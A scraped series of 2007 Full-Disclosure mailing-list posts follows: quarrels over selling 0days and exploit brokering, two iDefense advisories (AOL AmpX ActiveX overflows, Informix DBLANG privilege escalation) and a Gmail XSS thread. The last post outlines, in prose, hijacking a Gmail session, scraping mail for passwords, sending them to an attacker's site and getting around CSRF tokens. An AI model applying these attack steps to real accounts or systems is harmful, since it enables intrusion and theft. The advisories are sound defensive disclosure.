[Full-disclosure] still some 0days to sell
Hi, I still have some 0days (just a few now) to sell about windows and linux. information by e-mail. see you, Juergen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] still some 0days to sell
Ok, first off, this is FULL DISCLOSURE. Perhaps you meant to send this to I'm a haxor. Don't worry, common mistake. Second, I highly doubt you have some 0days, if any at all. Perhaps a few bugs/buffer under/over flows, but nothing that, in the computer security field, would justify the title 0day. Cheers, Mike Juergen Marester wrote: Hi, I still have some 0days (just a few now) to sell about windows and linux. information by e-mail. see you, Juergen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hushmail == Narqz
Paul, This hardly means that the hushmail crew are narqz, it just means that they are cooperating with the law like any legitimate business would. No, it doesn't mean they're narqa, but it does mean they're spineless pussies that eagerly sell people out. If a friend did that to you, what would you think of them? Take 'em down. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hushmail == Narqz
Ah well, if a friend did that to me... hrm... I'd probably tar and feather him near an open flame. ;] Byron Sonne wrote: Paul, This hardly means that the hushmail crew are narqz, it just means that they are cooperating with the law like any legitimate business would. No, it doesn't mean they're narqa, but it does mean they're spineless pussies that eagerly sell people out. If a friend did that to you, what would you think of them? Take 'em down. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Why I hate you (and a philanthropic challenge!)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear jackasses, I really think you should stop saying you have zero day to sell on Full Disclosure. Mostly because no-one really gives a shit. Also, no-one is really interested in paying for your horrible code. It looks worse than initd.sh. Seriously. My code sucks, but yours is far worse. Please stop wasting our time caring what you think. On to my idea! I think the next 7 (I'm being very optimistic here) zero day bugs should be bought by people giving money to charity organizations! We don't see enough selflessness in computer security, so stop being a dick: help save stuff that's important. So, here's how it should work. Post your zero day up on full disclosure. Yes, actually disclose it. Post what charity you are releasing the zero day for. Then, we as a public, will PayPal that charity (no, it can't be the Save SnoSoft and Netragard Fund) some monies. Wouldn't that be nice? We can help the EFF, battle illegal pornography or even support your favorite politician! Doesn't sound bad, does it? I will personally promise to donate up to 300$ (total, I'm not rich) to said charities assuming that they are legal and such. NOW GET TO WORK AND DROP SOME ZERO DAY NO, XSS DOES NOT COUNT Donb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHNKwDyWX0NBMJYAcRAjKAAJ0TGa4nMIKxkzn0L8abxrr6hrrueQCfUkti hul0/vIOYofT4TGBMxtBJ3o= =T42x -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Why I hate you (and a philanthropic challenge!)
I'll be more than happy to volunteer my charity to receive funds. :) (Helps AIDS orphans in Tanzania get an education and otherwise supports schools there). j On Nov 9, 2007 12:50 PM, don bailey [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear jackasses, I really think you should stop saying you have zero day to sell on Full Disclosure. Mostly because no-one really gives a shit. Also, no-one is really interested in paying for your horrible code. It looks worse than initd.sh. Seriously. My code sucks, but yours is far worse. Please stop wasting our time caring what you think. On to my idea! I think the next 7 (I'm being very optimistic here) zero day bugs should be bought by people giving money to charity organizations! We don't see enough selflessness in computer security, so stop being a dick: help save stuff that's important. So, here's how it should work. Post your zero day up on full disclosure. Yes, actually disclose it. Post what charity you are releasing the zero day for. Then, we as a public, will PayPal that charity (no, it can't be the Save SnoSoft and Netragard Fund) some monies. Wouldn't that be nice? We can help the EFF, battle illegal pornography or even support your favorite politician! Doesn't sound bad, does it? I will personally promise to donate up to 300$ (total, I'm not rich) to said charities assuming that they are legal and such. NOW GET TO WORK AND DROP SOME ZERO DAY NO, XSS DOES NOT COUNT Donb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHNKwDyWX0NBMJYAcRAjKAAJ0TGa4nMIKxkzn0L8abxrr6hrrueQCfUkti hul0/vIOYofT4TGBMxtBJ3o= =T42x -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hushmail == Narqz
On Nov 9, 2007 12:57 PM, Byron Sonne [EMAIL PROTECTED] wrote: No, it doesn't mean they're narqa, but it does mean they're spineless pussies that eagerly sell people out. If a friend did that to you, what would you think of them? Cooperating with a court order != being a pussy hushmail != your friend -- ME2 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Why I hate you (and a philanthropic challenge!)
So will I! Just send all funds to Western Union in Nigeria, Dr. Priest Amdul Bhudgetwajey... On Nov 9, 2007 2:11 PM, John C. A. Bambenek, CISSP [EMAIL PROTECTED] wrote: I'll be more than happy to volunteer my charity to receive funds. :) (Helps AIDS orphans in Tanzania get an education and otherwise supports schools there). j On Nov 9, 2007 12:50 PM, don bailey [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Dear jackasses, I really think you should stop saying you have zero day to sell on Full Disclosure. Mostly because no-one really gives a shit. Also, no-one is really interested in paying for your horrible code. It looks worse than initd.sh. Seriously. My code sucks, but yours is far worse. Please stop wasting our time caring what you think. On to my idea! I think the next 7 (I'm being very optimistic here) zero day bugs should be bought by people giving money to charity organizations! We don't see enough selflessness in computer security, so stop being a dick: help save stuff that's important. So, here's how it should work. Post your zero day up on full disclosure. Yes, actually disclose it. Post what charity you are releasing the zero day for. Then, we as a public, will PayPal that charity (no, it can't be the Save SnoSoft and Netragard Fund) some monies. Wouldn't that be nice? We can help the EFF, battle illegal pornography or even support your favorite politician! Doesn't sound bad, does it? I will personally promise to donate up to 300$ (total, I'm not rich) to said charities assuming that they are legal and such. NOW GET TO WORK AND DROP SOME ZERO DAY NO, XSS DOES NOT COUNT Donb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHNKwDyWX0NBMJYAcRAjKAAJ0TGa4nMIKxkzn0L8abxrr6hrrueQCfUkti hul0/vIOYofT4TGBMxtBJ3o= =T42x -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Exploit Brokering
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ This email is in response to all of the emails that I see with people trying to broker exploits by advertising them on full disclosure and other public mailing lists. ] SNOsoft has been legitimately and legally brokering exploits since early 2000, and we're still doing it very successfully. As a matter of policy we will not ever purchase items from careless developers, and will not sell to careless buyers or non US based buyers... With exploit brokering comes great responsibility and liability. People posting emails in public forums in an attempt to sell exploits is not only careless and irresponsible, but is also a testament to that persons immaturity and lack of experience. Do they ever stop to think about the potential liability? What happens if they sell to a hostile foreign party, what could happen to them, etc...? I think that there is a legitimate market for Exploit Brokering when it is done properly (ethically and legally). I think that in that market the developers should adhere to strict rules and not cross certain boundaries. I also think that the responsible and ethical developers should be paid fair value for their time, instead of a pathetic maximum of $5,000.00 for a high grade item. Think about it, the average QA Engineer makes more money per bug than the higher talent security researcher. There's something wrong with that. The solution to that problem is not to sell exploits to just anyone in a public forum. That introduces too much liability to the developer, especially if the buyer is illegitimate or hostile. The solution is to work with legitimate established businesses in a confidential and responsible manner. Unfortunately for those developers that are trying to sell exploits in public forum, their chances of working with legitimate businesses are gone. No way will any of the legitimate Exploit Brokers ever purchase an item from an irresponsible developer. Its just a matter of time till laws get passed and they end up getting thrown in jail for selling weaponized exploits to the wrong people. - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHNMFmf3Elv1PhzXgRAiVyAKCgKIhDLpqjkOK+Ndu+JHol2F7s1ACfbXFa 1Ju3+ZCeSWeDisUigMs1FY0= =uA7p -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
Dear Simon, SS What happens if they sell to a hostile SS foreign party, what could happen to them, etc...? Maybe they pereive your party as a hostile foreign party, this list is obviously not based in the US. The solution is to work with legitimate established businesses in a confidential and responsible manner. If you are responsible you surely can disclose who you are selling them too ? Are you even disclosing this to the person that you bought them from ? When not does this make you any better than the others ? -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
Please forgive me... should I beg for mercy? ;] Joey Mengele wrote: This is hardly on topic and you do not have any unique credentials to validate your claims. Please refrain from writing off topic and baseless editorials in the future or risk moderation. Thanks. J On Fri, 09 Nov 2007 15:22:01 -0500 Simon Smith [EMAIL PROTECTED] wrote: [ This email is in response to all of the emails that I see with people trying to broker exploits by advertising them on full disclosure and other public mailing lists. ] SNOsoft has been legitimately and legally brokering exploits since early 2000, and we're still doing it very successfully. As a matter of policy we will not ever purchase items from careless developers, and will not sell to careless buyers or non US based buyers... With exploit brokering comes great responsibility and liability. People posting emails in public forums in an attempt to sell exploits is not only careless and irresponsible, but is also a testament to that persons immaturity and lack of experience. Do they ever stop to think about the potential liability? What happens if they sell to a hostile foreign party, what could happen to them, etc...? I think that there is a legitimate market for Exploit Brokering when it is done properly (ethically and legally). I think that in that market the developers should adhere to strict rules and not cross certain boundaries. I also think that the responsible and ethical developers should be paid fair value for their time, instead of a pathetic maximum of $5,000.00 for a high grade item. Think about it, the average QA Engineer makes more money per bug than the higher talent security researcher. There's something wrong with that. The solution to that problem is not to sell exploits to just anyone in a public forum. That introduces too much liability to the developer, especially if the buyer is illegitimate or hostile. The solution is to work with legitimate established businesses in a confidential and responsible manner. Unfortunately for those developers that are trying to sell exploits in public forum, their chances of working with legitimate businesses are gone. No way will any of the legitimate Exploit Brokers ever purchase an item from an irresponsible developer. Its just a matter of time till laws get passed and they end up getting thrown in jail for selling weaponized exploits to the wrong people. -- - simon -- http://www.snosoft.com -- Click for free info on marketing degrees and make up to $150K/ year http://tagline.hushmail.com/fc/Ioyw6h4dDIrjbxctdTv0TSwcEUd8ohtJYd5yOv5FWQ7CcpXXXTOy6x/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
SNOsoft When the first word in the first sentence in a communique is a company name, you should take that as a warning everything that follows is a SNOsoft. People posting emails in public forums in an attempt to sell exploits is not only careless and irresponsible, It's called the free-market. but is also a testament to that persons immaturity and lack of experience. What you think that when you add the variables up that the only potential answer is the what you've come up with? Employing the free-market is not a testament to anything, much less a persons level of maturity or experience. Do they ever stop to think about the potential liability? What happens if they sell to a hostile foreign party, what could happen to them, etc...? Sure of course, you don't sell 0day to the organizations that the enemy of your country, thats common sense- however you put a breach of contract provision into your agreement that disallows transfer of content to third parties and then dont sell them to people from guangdong, its not stupidity, immaturity or lack of experience, its called due dilligence. I think that there is a legitimate market for Exploit Brokering when it is done properly (ethically and legally). I wish you people would stop putting your opinions on ethics to other people. I mean even business ethics does not follow the whats commonly associated with being ethical, thats why there is a special class for it in college and largely amounts to the questions 'is it legal?' and 'can i get away with it?'. In reality all your bantering about ethics and legality will result in is that bug information and exploits become subject to restricted export/sale legislation and then we'll be stuck with companies like yours. I mean seriously, has it not occurred to you that not everyone in the world is American and wants to sell their 0day to the NSA via SNOSoft? That perhaps the conjecture that they want to do that is against their morals and in turn does that not make you obtuse for expecting they abide by your own personal set of ethics? I think I don't care what you think, don't try to enforce your set of morals on me; im sure plenty of others agree with this sentiment. The solution to that problem is not to sell exploits to just anyone in a public forum. That introduces too much liability to the developer, especially if the buyer is illegitimate or hostile. The solution is to work with legitimate established businesses in a confidential and responsible manner. Not the solution is not to be stupid with your sales, you can meet people in public forums, just be able to show due dilligence that the parties you sold to are not enemies of your country and that their intentions are not to violate the law. Guns don't kill people, ... By responsible, you mean doing it the way you do? Its just a matter of time till laws get passed and they end up getting thrown in jail for selling weaponized exploits to the wrong people. Which is exactly what you want. Look almost everything is legal somewhere, that means you can't stop people who wish to conduct private business. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 First Answer: Only work with partners that are well established, incorporated, and have a legitimate use for the items that they want to purchase. Do not work with individual buyers/people, there's too much liability and no way to verify that they are actually US based. Make sure that every single transaction is done under tight legally binding contract. Perform background checks as necessary, etc. Second Answer: Same as the first one. Obviously this is just a light summary of the process that we follow, but it should give you an idea as to how we do business. security curmudgeon wrote: Hi Simon, : SNOsoft has been legitimately and legally brokering exploits since early : 2000, and we're still doing it very successfully. As a matter of policy : we will not ever purchase items from careless developers, and will not : sell to careless buyers or non US based buyers... With exploit brokering : comes great responsibility and liability. : : People posting emails in public forums in an attempt to sell exploits is : not only careless and irresponsible, but is also a testament to that : persons immaturity and lack of experience. Do they ever stop to think : about the potential liability? What happens if they sell to a hostile : foreign party, what could happen to them, etc...? Can you describe SNOsoft's process for validating buyers and assuring they are US based? Is there any process to ensure that even though they are US based they do not have any ill intention toward their country? Just because someone has a US ID doesn't mean they were born here or not working for a foreign party. jericho - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHNMdpf3Elv1PhzXgRAigLAJ9maYZlSEEBVjQ1cEZMrz0qpM3IOwCgplaF icYpd9+fSAcPr45wKnCgav0= =Qr8j -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
Hi Simon, : SNOsoft has been legitimately and legally brokering exploits since early : 2000, and we're still doing it very successfully. As a matter of policy : we will not ever purchase items from careless developers, and will not : sell to careless buyers or non US based buyers... With exploit brokering : comes great responsibility and liability. : : People posting emails in public forums in an attempt to sell exploits is : not only careless and irresponsible, but is also a testament to that : persons immaturity and lack of experience. Do they ever stop to think : about the potential liability? What happens if they sell to a hostile : foreign party, what could happen to them, etc...? Can you describe SNOsoft's process for validating buyers and assuring they are US based? Is there any process to ensure that even though they are US based they do not have any ill intention toward their country? Just because someone has a US ID doesn't mean they were born here or not working for a foreign party. jericho ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 11.09.07: AOL AmpX ActiveX Control Multiple Buffer Overflow Vulnerabilities
iDefense Security Advisory 11.09.07 http://labs.idefense.com/intelligence/vulnerabilities/ Nov 09, 2007 I. BACKGROUND America Online's AmpX is an ActiveX control associated with AOL Radio. It is typically used for embedding streaming audio content in web pages. For more information visit the following URL. http://music.aol.com/radioguide/bb/ II. DESCRIPTION Remote exploitation of multiple buffer overflow vulnerabilities in AOL's AmpX ActiveX control could allow attackers to execute arbitrary code with the credentials of the user visiting a malicious website. Several methods within the vulnerable ActiveX control (CLSID B49C4597-8721-4789-9250-315DFBD9F525) were found to be vulnerable to stack-based buffer overflows. In each case, variable length attacker supplied data is copied into a fixed-size stack buffer using the strcpy() function. Since no input validation is performed, it is possible to corrupt stack memory, resulting in an exploitable condition. III. ANALYSIS Exploitation allows an attacker to execute arbitrary code in the context of the user viewing a malicious web page. In order to be successful, the attacker must persuade a user with the vulnerable control installed into viewing a malicious web page. No further interaction is required. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 2.6.1.11 of America Online's AmpX.dll. Other versions are suspected to be vulnerable. V. WORKAROUND In order to prevent exploitation of this vulnerability, an administrator can set the kill-bit for the vulnerable control. While this does not fix the vulnerability, it does prevent the control from being loaded in Internet Explorer. VI. VENDOR RESPONSE An updated version of AOL Radio with enhanced security features is now available. AOL recommends that you download and install the update to get the best and most secure performance from AOL Radio. If you use AIM or other AOL software, you will automatically receive a prompt to update AOL Radio and you do not need to download and install this update now. Otherwise, please download the update from the URL below and double-click on the file to finish updating AOL Radio: http://radaol-prod-web-rr.streamops.aol.com/mediaplugin/unagi_patch.exe; VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-5755 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/24/2007 Initial vendor notification 04/24/2007 Initial vendor response 11/09/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thierry, my comments are below. Thierry Zoller wrote: Dear Simon, Well if it wasn't obvious enough let me rephrase. SS What happens if they sell to a hostile SS foreign party, what could happen to them, etc...? Maybe they pereive your party as a hostile foreign party, this list is obviously not based in the US. SS What's your point? I think my point is very clear, those trying to find a buyer on this list (who you are directly speaking to in your post) are maybe not interested in selling to US based parties. You assume they are. Right, I did make that assumption and that was purely based on my perspective as a US based broker. There is no reason why the same kind of business can't be done in other countries. I was thinking strictly about my liabilities as a US based person and my restrictions only. The US is only one country out of many. To make this even clearer : SSDo they ever stop to think SS about the potential liability? What happens if they sell to a hostile SSforeign party, what, what could happen to them, etc...? Maybe the hostile foreign party for them is the USA. Quite possibly and I could think of many reasons why people would think so, especially with our current president in office. The solution is to work with legitimate established businesses in a confidential and responsible manner. If you are responsible you surely can disclose who you are selling them too ? SS That would be irresponsible. Why would disclosing who you are selling them to be irresponsible ? You argue that those seeking to sell over FD are carelss and irresponsible. Now why if they sell them to you makes them less careless and irresponsible since they still don't know with whom the information will end up with. Again from my perspective it would be irresponsible as we have confidentiality agreements in place with partners. It might not be irresponsible for others to disclose that information. Are you even disclosing this to the person that you bought them from ? When not does this make you any better than the others ? SS I have no idea what you are asking me here. Are you disclosing _to the person_ you bought the bugs from, to whom you are going to sell them ? If not I don't see the interest why they should choose you over others for ethical reasons. Same answer as above. I should apologize because the initial email sounded very arrogant. With that said, there is still responsible brokering and irresponsible brokering. Selling exploits to just anyone is irresponsible. - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHNNNaf3Elv1PhzXgRAsIRAKDHzj0Z6jMQk+A6Qkl1cWoQdzMApQCgjCI9 DD1lLw2QWmAVKC/7J/XmQTk= =enDt -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
Dear Simon, Well if it wasn't obvious enough let me rephrase. SS What happens if they sell to a hostile SS foreign party, what could happen to them, etc...? Maybe they pereive your party as a hostile foreign party, this list is obviously not based in the US. SS What's your point? I think my point is very clear, those trying to find a buyer on this list (who you are directly speaking to in your post) are maybe not interested in selling to US based parties. You assume they are. To make this even clearer : SSDo they ever stop to think SS about the potential liability? What happens if they sell to a hostile SSforeign party, what, what could happen to them, etc...? Maybe the hostile foreign party for them is the USA. The solution is to work with legitimate established businesses in a confidential and responsible manner. If you are responsible you surely can disclose who you are selling them too ? SS That would be irresponsible. Why would disclosing who you are selling them to be irresponsible ? You argue that those seeking to sell over FD are carelss and irresponsible. Now why if they sell them to you makes them less careless and irresponsible since they still don't know with whom the information will end up with. Are you even disclosing this to the person that you bought them from ? When not does this make you any better than the others ? SS I have no idea what you are asking me here. Are you disclosing _to the person_ you bought the bugs from, to whom you are going to sell them ? If not I don't see the interest why they should choose you over others for ethical reasons. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 No doubt... [EMAIL PROTECTED] wrote: On Fri, 09 Nov 2007 16:38:35 EST, Simon Smith said: Thierry Zoller wrote: Maybe the hostile foreign party for them is the USA. Quite possibly and I could think of many reasons why people would think so, especially with our current president in office. Note that given the recent approval polls for said president, you can probably strike foreign from Thierry's comment and it still be correct... - -- - - simon - -- http://www.snosoft.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (Darwin) iD8DBQFHNNYpf3Elv1PhzXgRAnSOAJwNe3L78ON7kcQL3QjJefJPS+wwlwCeN+kC ydvhgAGKVrHedbSJUhzlmio= =0Hxy -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
Dear Simon, SS Selling exploits to just anyone is irresponsible. Fully agree, I interpreted your intial post as being US centric and based on ethical judgement, hence my comments. No hard feelings =) -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iDefense Security Advisory 11.09.07: IBM Informix Dynamic Server DBLANG Directory Traversal Vulnerability
iDefense Security Advisory 11.09.07 http://labs.idefense.com/intelligence/vulnerabilities/ Nov 09, 2007 I. BACKGROUND IBM Corp.'s Informix Dynamic Server is an online transaction processing data server. It contains several set-uid root binaries. For more information, visit the product homepage at the following URL. http://www-306.ibm.com/software/data/informix/ids/ II. DESCRIPTION Local exploitation of a directory traversal vulnerability in IBM Corp.'s Informix Dynamic Server allows attackers to elevate privileges to root. This vulnerability exists due to insufficient checking for directory traversal sequences when processing the DBLANG environment variable. By using values containing directory traversal specifiers, such as ../, an attacker can cause set-uid binaries to use Native Language Support (NLS) message files under their control. III. ANALYSIS Exploitation allows local attackers to gain root privileges. In order to exploit this vulnerability, an attacker would need access to execute one of the set-uid root binaries that utilizes the DBLANG environment variable. Since an attacker can control NLS message file data, they are able to pass arbitrary format string arguments to the variable argument function printf(3). Consequently, this vulnerability can be exploited using publicly known format string exploitation techniques. When attempting to exploit this vulnerability, it is likely that an attacker would try to execute code within area of memory that are considered data. As such, NX, XD, exec-shield, PAX and other data execution prevention technologies can decrease the likelihood of success. IV. DETECTION iDefense confirmed the existence of this vulnerability in IBM Corp.'s Informix Dynamic Server version 10.00 UC6TL installed on a Linux system. Other versions are also suspected as vulnerable. Versions for other supported Unix systems should also be considered vulnerable. V. WORKAROUND Removing the set-uid bit from all programs included with Informix will prevent exploitation. However, doing so may also disable functionality. VI. VENDOR RESPONSE IBM Corp. has addressed this vulnerability within version 10.00.xC7W1 of Informix Dynamic Server. For more information, visit the following URL. http://www-1.ibm.com/support/docview.wss?uid=swg27011082 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-5670 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/01/2007 Initial vendor notification 09/13/2007 Initial vendor response 11/06/2007 IBM Released 10.00.xC7W1 11/09/2007 Public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
On Fri, 09 Nov 2007 16:38:35 EST, Simon Smith said: Thierry Zoller wrote: Maybe the hostile foreign party for them is the USA. Quite possibly and I could think of many reasons why people would think so, especially with our current president in office. Note that given the recent approval polls for said president, you can probably strike foreign from Thierry's comment and it still be correct... pgp4Tuw22f1BT.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Exploit Brokering
No worries man, I should have been more clear. Thierry Zoller wrote: Dear Simon, SS Selling exploits to just anyone is irresponsible. Fully agree, I interpreted your intial post as being US centric and based on ethical judgement, hence my comments. No hard feelings =) -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
Hello Juergen,
With all my respect, is it that hard to see that gaining access to a
Gmail session can lead to your identity being stolen?
Nowadays your webmail account means your online life/presence. Let's
have a walk through attack shall we?
1. Your Gmail session is hijacked (i.e.: via the XSS PoC posted on FD)
2. Attacker searches for password in 'Inbox'/'Sent Mail'.
- How many times have you clicked on Forgot password on MULTIPLE
online accounts and the password (whether a new pass or the original
one) emailed to you has not been changed from the time you got the
forgotten password email?
- How many users have emailed passwords to themselves so that they
don't forget?
- How many users use the same password on MULTIPLE online accounts
(including merchant/e-commerce accounts)?
- How many users have clicked on remember credit card details so
that they don't have to re-enter their CC data every time they perform
an online transaction?
- Did you forget to disable your Gtalk chat history (Gtalk is still
within the google.com domain)
- Have you saved anything personal on other services such as Google
docs/calendar/notebook? (or any other google.com service that doesn't
require you to re-login once authenticated)
3. For most victims, this leads to a compromise of his/her online identity.
If you fail to see the problem, then please think before you complain
about damn, right now 0day are fucking XSS
Posting a XSS PoC that opens an alert box doesn't have much merit
perhaps. However, this is the equivalent of saying: hey, I can cause
a BO condition. If you send X parameter with 500 bytes/chars or more,
then EIP is overwritten and the attacked service crashes. Now compare
that to actually compromising the server via the buffer overflow
vulnerability. That's a DIFFERENT STORY.
Same thing goes for any XSS. Now say, screw a cookie theft exploit for
the Gmail XSS! (pardon my French). Make something more clever!
Perhaps, you want a payload that scrapes all the victim's emails which
contain keywords such as 'password', 'private', 'admin', and so on.
Then, all the captured data is submitted to the attacker's site in the
background (nothing suspicious is visually happening from the victim's
point of view).
Sure Gmail has CSRF protection, but that can be bypassed via XSS.
After all, anti-CSRF tokens can be grabbed if URLs can be accessed
within the security context of the target domain (which is possible
via XSS).
If you consider all the aforementioned thoughts plus the fact that
Gmail is one of the most popular webmail services, then you should be
able to understand the power of a XSS vul on google.com !
Regards,
AP.
On Nov 8, 2007 8:55 PM, Juergen Marester [EMAIL PROTECTED] wrote:
wow ! 0day !
damn, right now 0day are fucking XSS ...
On 11/8/07, silky [EMAIL PROTECTED] wrote:
worked for me minutes after it was posted. seems fixed now.
On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
i tested it on gmail latest version,itsnot working for me?
On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
There is a html injection vulnerability in https://www.google.com.
It is very critical,you can get the cookie to login into gmail ore
other
service.
POC:
